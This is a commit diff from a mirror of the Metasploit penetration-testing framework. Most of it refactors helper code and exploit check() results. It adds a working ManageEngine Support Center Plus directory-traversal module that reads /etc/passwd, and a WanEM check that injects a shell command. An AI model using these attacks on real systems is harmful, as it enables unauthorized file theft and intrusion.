infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into upgrade_psh 

Conflicts:
	lib/msf/core/post/file.rb
bug/bundler_fix
Meatballs 2014-02-03 18:02:09 +00:00
parent 95eb758642 d5709c51cc
commit 08493f2670
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
277 changed files with 2054 additions and 700 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.travis.yml
View File

@ -1,9 +1,11 @@
language: ruby
env: MSF_SPOTCHECK_RECENT=1
before_install:
- rake --version
- sudo apt-get update -qq
- sudo apt-get install -qq libpcap-dev
before_script:
- ./tools/msftidy.rb
- cp config/database.yml.travis config/database.yml
- bundle exec rake --version
- bundle exec rake db:create

100
lib/msf/base/sessions/meterpreter.rb
View File

@ -303,52 +303,20 @@ class Meterpreter < Rex::Post::Meterpreter::Client
safe_info.gsub!(/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]+/n,"_")
self.info = safe_info
# Enumerate network interfaces to detect IP
ifaces = self.net.config.get_interfaces().flatten rescue []
routes = self.net.config.get_routes().flatten rescue []
shost = self.session_host
# Try to match our visible IP to a real interface
# TODO: Deal with IPv6 addresses
found = !!(ifaces.find {|i| i.addrs.find {|a| a == shost } })
nhost = nil
hobj = nil
if Rex::Socket.is_ipv4?(shost) and not found
# Try to find an interface with a default route
default_routes = routes.select{ |r| r.subnet == "0.0.0.0" || r.subnet == "::" }
default_routes.each do |r|
ifaces.each do |i|
bits = Rex::Socket.net2bitmask( i.netmask ) rescue 32
rang = Rex::Socket::RangeWalker.new( "#{i.ip}/#{bits}" ) rescue nil
if rang and rang.include?( r.gateway )
nhost = i.ip
break
end
end
break if nhost
end
# Find the first non-loopback address
if not nhost
iface = ifaces.select{|i| i.ip != "127.0.0.1" and i.ip != "::1" }
if iface.length > 0
nhost = iface.first.ip
end
end
end
nhost = find_internet_connected_address
original_session_host = self.session_host
# If we found a better IP address for this session, change it up
# only handle cases where the DB is not connected here
if not (framework.db and framework.db.active)
if !(framework.db && framework.db.active)
self.session_host = nhost
end
# The rest of this requires a database, so bail if it's not
# there
return if not (framework.db and framework.db.active)
return if !(framework.db && framework.db.active)
::ActiveRecord::Base.connection_pool.with_connection {
wspace = framework.db.find_workspace(workspace)
@ -384,18 +352,18 @@ class Meterpreter < Rex::Post::Meterpreter::Client
if nhost
framework.db.report_note({
:type => "host.nat.server",
:host => shost,
:host => original_session_host,
:workspace => wspace,
:data => { :info => "This device is acting as a NAT gateway for #{nhost}", :client => nhost },
:update => :unique_data
})
framework.db.report_host(:host => shost, :purpose => 'firewall' )
framework.db.report_host(:host => original_session_host, :purpose => 'firewall' )
framework.db.report_note({
:type => "host.nat.client",
:host => nhost,
:workspace => wspace,
:data => { :info => "This device is traversing NAT gateway #{shost}", :server => shost },
:data => { :info => "This device is traversing NAT gateway #{original_session_host}", :server => original_session_host },
:update => :unique_data
})
framework.db.report_host(:host => nhost, :purpose => 'client' )
@ -470,6 +438,60 @@ protected
attr_accessor :rstream # :nodoc:
# Rummage through this host's routes and interfaces looking for an
# address that it uses to talk to the internet.
#
# @see Rex::Post::Meterpreter::Extensions::Stdapi::Net::Config#get_interfaces
# @see Rex::Post::Meterpreter::Extensions::Stdapi::Net::Config#get_routes
# @return [String] The address from which this host reaches the
# internet, as ASCII. e.g.: "192.168.100.156"
def find_internet_connected_address
ifaces = self.net.config.get_interfaces().flatten rescue []
routes = self.net.config.get_routes().flatten rescue []
# Try to match our visible IP to a real interface
found = !!(ifaces.find { |i| i.addrs.find { |a| a == session_host } })
nhost = nil
# If the host has no address that matches what we see, then one of
# us is behind NAT so we have to look harder.
if !found
# Grab all routes to the internet
default_routes = routes.select { |r| r.subnet == "0.0.0.0" || r.subnet == "::" }
default_routes.each do |route|
# Now try to find an interface whose network includes this
# Route's gateway, which means it's the one the host uses to get
# to the interweb.
ifaces.each do |i|
# Try all the addresses this interface has configured
addr_and_mask = i.addrs.zip(i.netmasks).find do |addr, netmask|
bits = Rex::Socket.net2bitmask( netmask )
range = Rex::Socket::RangeWalker.new("#{addr}/#{bits}") rescue nil
!!(range && range.valid? && range.include?(route.gateway))
end
if addr_and_mask
nhost = addr_and_mask[0]
break
end
end
break if nhost
end
if !nhost
# Find the first non-loopback address
non_loopback = ifaces.find { |i| i.ip != "127.0.0.1" && i.ip != "::1" }
if non_loopback
nhost = non_loopback.ip
end
end
end
nhost
end
end
end

22
lib/msf/core/post/common.rb
View File

@ -2,6 +2,28 @@
module Msf::Post::Common
def rhost
case session.type
when 'meterpreter'
session.sock.peerhost
when 'shell'
session.session_host
end
end
def rport
case session.type
when 'meterpreter'
session.sock.peerport
when 'shell'
session.session_port
end
end
def peer
"#{rhost}:#{rport}"
end
#
# Checks if the remote system has a process with ID +pid+
#

5
lib/msf/core/post/file.rb
View File

@ -98,16 +98,15 @@ module Msf::Post::File
return !!(stat)
else
if session.platform =~ /win/
f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )")
# XXX
else
f = session.shell_command_token("test -e '#{path}' && echo true")
end
return false if f.nil? or f.empty?
return false unless f =~ /true/
return true
end
end
end
#
# Remove a remote file

3
lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
View File

@ -49,10 +49,9 @@ class Config
get_interfaces().each(&block)
end
#
# Returns an array of network interfaces with each element.
#
# being an Interface
# @return [Array<Interface>]
def get_interfaces
request = Packet.create_request('stdapi_net_config_get_interfaces')
ifaces = []

56
modules/auxiliary/scanner/h323/h323_version.rb
View File

@ -51,7 +51,17 @@ class Metasploit3 < Msf::Auxiliary
conf_guid = Rex::Text.rand_text(16)
call_guid = Rex::Text.rand_text(16)
pkt_setup = h323_setup_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
pkt_setup = h323_setup_call({
:caller_name => caller_name,
:h323_id => h323_id,
:vendor_id => vendor_id,
:callee_host => callee_host,
:callee_port => callee_port,
:caller_host => caller_host,
:caller_port => caller_port,
:conf_guid => conf_guid,
:call_guid => call_guid
})
res = sock.put(pkt_setup) rescue nil
if not res
@ -88,7 +98,10 @@ class Metasploit3 < Msf::Auxiliary
end
# Make sure the call was shut down cleanly
pkt_release = h323_release_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
pkt_release = h323_release_call({
:caller_name => caller_name,
:call_guid => call_guid
})
sock.put(pkt_release) rescue nil
# End timeout block
@ -352,7 +365,16 @@ class Metasploit3 < Msf::Auxiliary
#
# This is ugly. Doing it properly requires a PER capable ASN.1 encoder, which is overkill for this task
#
def create_user_info(h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
def create_user_info(opts = {})
h323_id = opts[:h323_id]
vendor_id = opts[:vendor_id]
callee_host = opts[:callee_host]
callee_port = opts[:callee_port]
caller_host = opts[:caller_host]
caller_port = opts[:caller_port]
conf_guid = opts[:conf_guid]
call_guid = opts[:call_guid]
buff = "\x05" # Protocol descriminator: X.208/X.209 coded user information
buff << "\x20\xa8\x06\x00\x08\x91\x4a\x00\x06\x01\x40\x02"
@ -539,7 +561,10 @@ class Metasploit3 < Msf::Auxiliary
"\x02\x80\x01\x00"
end
def h323_release_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
def h323_release_call(opts = {})
caller_name = opts[:caller_name]
call_guid = opts[:call_guid]
encap_tpkt(3,
encap_q225_release(
create_ie_display(caller_name) +
@ -550,13 +575,32 @@ class Metasploit3 < Msf::Auxiliary
)
end
def h323_setup_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid)
def h323_setup_call(opts = {})
caller_name = opts[:caller_name]
h323_id = opts[:h323_id]
vendor_id = opts[:vendor_id]
callee_host = opts[:callee_host]
callee_port = opts[:callee_port]
caller_host = opts[:caller_host]
caller_port = opts[:caller_port]
conf_guid = opts[:conf_guid]
call_guid = opts[:call_guid]
encap_tpkt(3,
encap_q225_setup(
create_ie_bearer_capability() +
create_ie_display(caller_name) +
create_ie_user_user(
create_user_info( h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid )
create_user_info({
:h323_id => h323_id,
:vendor_id => vendor_id,
:callee_host => callee_host,
:callee_port => callee_port,
:caller_host => caller_host,
:caller_port => caller_port,
:conf_guid => conf_guid,
:call_guid => call_guid
})
)
)
)

160
modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb Normal file
View File

@ -0,0 +1,160 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Support Center Plus Directory Traversal",
'Description' => %q{
This module exploits a directory traversal vulnerability found in ManageEngine
Support Center Plus build 7916 and lower. The module will create a support ticket
as a normal user, attaching a link to a file on the server. By requesting our
own attachment, it's possible to retrieve any file on the filesystem with the same
privileges as Support Center Plus is running. On Windows this is always with SYSTEM
privileges.
},
'License' => MSF_LICENSE,
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
'References' =>
[
['EDB', '31262'],
['OSVDB', '102656'],
['BID', '65199'],
['URL', 'http://packetstormsecurity.com/files/124975/ManageEngine-Support-Center-Plus-7916-Directory-Traversal.html']
],
'DisclosureDate' => "Jan 28 2014"
))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'The base path to the Support Center Plus installation', '/']),
OptString.new('USER', [true, 'The Support Center Plus user', 'guest']),
OptString.new('PASS', [true, 'The Support Center Plus password', 'guest']),
OptString.new('FILE', [true, 'The Support Center Plus password', '/etc/passwd'])
], self.class)
end
def run_host(ip)
uri = target_uri.path
peer = "#{ip}:#{rport}"
vprint_status("#{peer} - Retrieving cookie")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "")
})
if res and res.code == 200
session = res.get_cookies
else
vprint_error("#{peer} - Server returned #{res.code.to_s}")
end
vprint_status("#{peer} - Logging in as user [ #{datastore['USER']} ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "j_security_check"),
'cookie' => session,
'vars_post' =>
{
'j_username' => datastore['USER'],
'j_password' => datastore['PASS'],
'logonDomainName' => 'undefined',
'sso_status' => 'false',
'loginButton' => 'Login'
}
})
if res and res.code == 302
vprint_status("#{peer} - Login succesful")
else
vprint_error("#{peer} - Login was not succesful!")
return
end
randomname = Rex::Text.rand_text_alphanumeric(10)
vprint_status("#{peer} - Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "WorkOrder.do"),
'cookie' => session,
'vars_post' =>
{
'reqTemplate' => '',
'prodId' => '0',
'priority' => '2',
'reqID' => '2',
'usertypename' => 'Requester',
'reqName' => 'Guest',
'category' => '0',
'item' => '0',
'subCategory' => '0',
'title' => randomname,
'description' => randomname,
'MOD_IND' => 'WorkOrder',
'FORMNAME' => 'WorkOrderForm',
'attach' => "/../../../../../../../../../../../..#{datastore['FILE']}",
'attPath' => '',
'component' => 'Request',
'attSize' => Rex::Text.rand_text_numeric(8),
'attachments' => randomname,
'autoCCList' => '',
'addWO' => 'addWO'
}
})
if res and res.code == 200
vprint_status("#{peer} - Ticket created")
if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/)
fileid = $1
vprint_status("#{peer} - File ID is [ #{fileid} ]")
fileauthkey = $2
vprint_status("#{peer} - Auth Key is [ #{fileauthkey} ]")
else
vprint_error("#{peer} - File ID and AuthKey not found!")
end
else
vprint_error("#{peer} - Ticket not created due to error!")
return
end
vprint_status("#{peer} - Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"),
'vars_get' =>
{
'module' => 'Request',
'ID' => fileid,
'authKey' => fileauthkey
}
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either. Print the status code for debugging purposes.
if res and res.code == 200
data = res.body
p = store_loot(
'manageengine.supportcenterplus',
'application/octet-stream',
ip,
data,
datastore['FILE']
)
print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]")
else
vprint_error("#{peer} - Server returned #{res.code.to_s}")
end
end
end

7
modules/auxiliary/scanner/printer/printer_download_file.rb
View File

@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary
Printer Job Language (PJL) protocol.
},
"Author" => [
"wvu", # This implementation
"wvu", # Rex::Proto::PJL and modules
"sinn3r", # RSpec tests
"MC", # Independent implementation
"Myo Soe" # Independent implementation
"MC", # Independent mixin and modules
"Myo Soe", # Independent modules
"Matteo Cantoni <goony[at]nothink.org>" # Independent modules
],
"References" => [
["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"]

7
modules/auxiliary/scanner/printer/printer_env_vars.rb
View File

@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary
Printer Job Language (PJL) protocol.
},
"Author" => [
"wvu", # This implementation
"wvu", # Rex::Proto::PJL and modules
"sinn3r", # RSpec tests
"MC", # Independent implementation
"Myo Soe" # Independent implementation
"MC", # Independent mixin and modules
"Myo Soe", # Independent modules
"Matteo Cantoni" # Independent modules
],
"References" => [
["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"]

7
modules/auxiliary/scanner/printer/printer_list_dir.rb
View File

@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary
Printer Job Language (PJL) protocol.
},
"Author" => [
"wvu", # This implementation
"wvu", # Rex::Proto::PJL and modules
"sinn3r", # RSpec tests
"MC", # Independent implementation
"Myo Soe" # Independent implementation
"MC", # Independent mixin and modules
"Myo Soe", # Independent modules
"Matteo Cantoni <goony[at]nothink.org>" # Independent modules
],
"References" => [
["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"]

7
modules/auxiliary/scanner/printer/printer_list_volumes.rb
View File

@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary
Printer Job Language (PJL) protocol.
},
"Author" => [
"wvu", # This implementation
"wvu", # Rex::Proto::PJL and modules
"sinn3r", # RSpec tests
"MC", # Independent implementation
"Myo Soe" # Independent implementation
"MC", # Independent mixin and modules
"Myo Soe", # Independent modules
"Matteo Cantoni <goony[at]nothink.org>" # Independent modules
],
"References" => [
["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"]

7
modules/auxiliary/scanner/printer/printer_ready_message.rb
View File

@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary
a set of printers using the Printer Job Language (PJL) protocol.
},
"Author" => [
"wvu", # This implementation
"wvu", # Rex::Proto::PJL and modules
"sinn3r", # RSpec tests
"MC", # Independent implementation
"Myo Soe" # Independent implementation
"MC", # Independent mixin and modules
"Myo Soe", # Independent modules
"Matteo Cantoni <goony[at]nothink.org>" # Independent modules
],
"References" => [
["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"]

7
modules/auxiliary/scanner/printer/printer_version_info.rb
View File

@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary
Printer Job Language (PJL) protocol.
},
"Author" => [
"wvu", # This implementation
"wvu", # Rex::Proto::PJL and modules
"sinn3r", # RSpec tests
"MC", # Independent implementation
"Myo Soe" # Independent implementation
"MC", # Independent mixin and modules
"Myo Soe", # Independent modules
"Matteo Cantoni <goony[at]nothink.org>" # Independent modules
],
"References" => [
["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"]

6
modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
View File

@ -106,15 +106,15 @@ class Metasploit3 < Msf::Exploit::Remote
if rel.length > 0
if rel[0,2] == 'rc'
if rel[2,rel.length].to_i >= 3
status = CheckCode::Vulnerable
status = CheckCode::Appears
end
else
status = CheckCode::Vulnerable
status = CheckCode::Appears
end
end
when '3'
# 1.3.3+ defaults to vulnerable (until >= 1.3.3c)
status = CheckCode::Vulnerable
status = CheckCode::Appears
if rel.length > 0
if rel[0,2] != 'rc' and rel[0,1] > 'b'
status = CheckCode::Safe

2
modules/exploits/irix/lpd/tagprinter_exec.rb
View File

@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
if (resp =~ /IRIX/)
print_status("Response: #{resp.strip}")
vprint_status("Response: #{resp.strip}")
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe

8
modules/exploits/linux/ftp/proftp_sreplace.rb
View File

@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
ret = connect
# We just want the banner to check against our targets..
print_status("FTP Banner: #{banner.strip}")
vprint_status("FTP Banner: #{banner.strip}")
status = CheckCode::Safe
@ -129,16 +129,16 @@ class Metasploit3 < Msf::Exploit::Remote
relv = rel.slice!(0,1)
case relv
when '2'
status = CheckCode::Vulnerable
status = CheckCode::Appears
when '3'
# 1.3.x before 1.3.1 is vulnerable
status = CheckCode::Vulnerable
status = CheckCode::Appears
if rel.length > 0
if rel.to_i > 0
status = CheckCode::Safe
else
status = CheckCode::Vulnerable
status = CheckCode::Appears
end
end
end

8
modules/exploits/linux/ftp/proftp_telnet_iac.rb
View File

@ -274,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote
banner = sock.get_once || ''
# We just want the banner to check against our targets..
print_status("FTP Banner: #{banner.strip}")
vprint_status("FTP Banner: #{banner.strip}")
status = CheckCode::Safe
if banner =~ /ProFTPD (1\.3\.[23][^ ])/i
@ -286,15 +286,15 @@ class Metasploit3 < Msf::Exploit::Remote
if rel.length > 0
if rel[0,2] == 'rc'
if rel[2,rel.length].to_i >= 3
status = CheckCode::Vulnerable
status = CheckCode::Appears
end
else
status = CheckCode::Vulnerable
status = CheckCode::Appears
end
end
when '3'
# 1.3.3+ defaults to vulnerable (until >= 1.3.3c)
status = CheckCode::Vulnerable
status = CheckCode::Appears
if rel.length > 0
if rel[0,2] != 'rc' and rel[0,1] > 'b'
status = CheckCode::Safe

10
modules/exploits/linux/games/ut2004_secure.rb
View File

@ -92,23 +92,23 @@ class Metasploit3 < Msf::Exploit::Remote
vers = ut_version
if (not vers)
print_status("Could not detect Unreal Tournament Server")
return
vprint_status("Could not detect Unreal Tournament Server")
return Exploit::CheckCode::Unknown
end
print_status("Detected Unreal Tournament Server Version: #{vers}")
if (vers =~ /^(3120|3186|3204)$/)
print_status("This system appears to be exploitable")
vprint_status("This system appears to be exploitable")
return Exploit::CheckCode::Appears
end
if (vers =~ /^(2...)$/)
print_status("This system appears to be running UT2003")
vprint_status("This system appears to be running UT2003")
return Exploit::CheckCode::Detected
end
print_status("This system appears to be patched")
vprint_status("This system appears to be patched")
return Exploit::CheckCode::Safe
end

2
modules/exploits/linux/http/astium_sqli_upload.rb
View File

@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
# Check version
print_status("#{peer} - Trying to detect Astium")
vprint_status("#{peer} - Trying to detect Astium")
res = send_request_cgi({
'method' => 'GET',

2
modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
View File

@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
res = send_request_cgi({ 'uri' => '/comm.asp' })
if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/
return Exploit::CheckCode::Detected
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end

7
modules/exploits/linux/http/hp_system_management.rb
View File

@ -71,9 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => "/cpqlogin.htm"
})
if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/
if res.nil?
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
elsif res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/
version = $1
return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1"
return Exploit::CheckCode::Appears if version <= "7.1.1.1"
end
return Exploit::CheckCode::Safe

5
modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb
View File

@ -57,11 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
vprint_error("A connection error has occured")
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe

9
modules/exploits/linux/http/mutiny_frontend_upload.rb
View File

@ -128,12 +128,17 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "interface", "/"),
})
if res and res.body =~ /var currentMutinyVersion = "Version ([0-9\.-]*)/
if res.nil?
vprint_error("Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.body =~ /var currentMutinyVersion = "Version ([0-9\.-]*)/
version = $1
end
if version and version >= "5" and version <= "5.0-1.07"
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe

5
modules/exploits/linux/http/nginx_chunked_size.rb
View File

@ -88,10 +88,11 @@ class Metasploit4 < Msf::Exploit::Remote
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end
#

8
modules/exploits/linux/http/openfiler_networkcard_exec.rb
View File

@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
# retrieve software version from login page
print_status("#{peer} - Sending check")
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/'
@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
end
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
def on_new_session(client)

2
modules/exploits/linux/http/pineapp_livelog_exec.rb
View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
'nsserver' => Rex::Text.encode_base64("127.0.0.1")
}
})
if res and res.code == 200 and res.body =~ /NS Query result for 127.0.0.1/
if res and res.code == 200 and res.body =~ /NS Query result for 127\.0\.0\.1/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe

2
modules/exploits/linux/http/smt_ipmi_close_window_bof.rb
View File

@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
def target_smt_x9_214

14
modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb
View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
print_status("#{peer} - Trying to detect installed version")
vprint_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
@ -80,21 +80,21 @@ class Metasploit3 < Msf::Exploit::Remote
model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
model = "DS#{model}" unless model =~ /^[A-Z]/
else
print_status("#{peer} - Detection failed")
vprint_status("#{peer} - Detection failed")
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Model #{model} with version #{version}-#{build} detected")
vprint_status("#{peer} - Model #{model} with version #{version}-#{build} detected")
case version
when '4.0'
return Exploit::CheckCode::Vulnerable if build < '2259'
return Exploit::CheckCode::Appears if build < '2259'
when '4.1'
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
when '4.2'
return Exploit::CheckCode::Vulnerable if build < '3243'
return Exploit::CheckCode::Appears if build < '3243'
when '4.3'
return Exploit::CheckCode::Vulnerable if build < '3810'
return Exploit::CheckCode::Appears if build < '3810'
return Exploit::CheckCode::Detected if build == '3810'
end

4
modules/exploits/linux/http/wanem_exec.rb
View File

@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = "pc=127.0.0.1; "
data << Rex::Text.uri_encode("echo #{fingerprint}")
data << "%26"
print_status("#{peer} - Sending check")
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => data
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end

4
modules/exploits/linux/http/webcalendar_settings_exec.rb
View File

@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => "#{uri}/login.php"
})
if res and res.body =~ /WebCalendar v1.2.\d/
return Exploit::CheckCode::Vulnerable
if res and res.body =~ /WebCalendar v1\.2\.\d/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end

6
modules/exploits/linux/http/zabbix_sqli.rb
View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
# Check version
print_status("#{peer} - Trying to detect installed version")
vprint_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/
version = $1
print_status("#{peer} - Zabbix version #{version} detected")
vprint_status("#{peer} - Zabbix version #{version} detected")
else
# If this fails, guest access may not be enabled
print_status("#{peer} - Unable to access httpmon.php")
vprint_status("#{peer} - Unable to access httpmon.php")
return Exploit::CheckCode::Unknown
end

8
modules/exploits/linux/http/zen_load_balancer_exec.rb
View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
# retrieve software version from config file
print_status("#{peer} - Sending check")
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/config/global.conf'
@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
end
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
def exploit

8
modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
View File

@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => "GET",
'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
})
return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
return Exploit::CheckCode::Appears if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{peer} - Connection failed")
end
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Save
end
def exploit

4
modules/exploits/linux/imap/imap_uw_lsub.rb
View File

@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
connect
disconnect
if (banner =~ /IMAP4rev1 v12.264/)
return Exploit::CheckCode::Vulnerable
if (banner =~ /IMAP4rev1 v12\.264/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe

2
modules/exploits/linux/local/sophos_wpa_clear_keys.rb
View File

@ -62,7 +62,7 @@ class Metasploit4 < Msf::Exploit::Local
return CheckCode::Detected
end
return CheckCode::Unknown
return CheckCode::Safe
end
def exploit

2
modules/exploits/linux/local/vmware_mount.rb
View File

@ -57,7 +57,7 @@ class Metasploit4 < Msf::Exploit::Local
def check
if setuid?("/usr/bin/vmware-mount")
CheckCode::Vulnerable
CheckCode::Appears
else
CheckCode::Safe
end

2
modules/exploits/linux/local/zpanel_zsudo.rb
View File

@ -51,7 +51,7 @@ class Metasploit4 < Msf::Exploit::Local
return CheckCode::Detected
end
return CheckCode::Unknown
return CheckCode::Safe
end
def exploit

4
modules/exploits/linux/misc/hp_vsa_login_bof.rb
View File

@ -70,13 +70,13 @@ class Metasploit3 < Msf::Exploit::Remote
def check
connect
packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
print_status("#{rhost}:#{rport} Sending login packet to check...")
vprint_status("#{rhost}:#{rport} Sending login packet to check...")
sock.put(packet)
res = sock.get_once
disconnect
if res and res=~ /OK/ and res =~ /Login/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
elsif res and res =~ /FAILED/ and res =~ /version/
return Exploit::CheckCode::Detected
end

4
modules/exploits/linux/misc/nagios_nrpe_arguments.rb
View File

@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
print_status("Checking if remote NRPE supports command line arguments")
vprint_status("Checking if remote NRPE supports command line arguments")
begin
# send query asking to run "fake_check" command with command substitution in arguments
@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
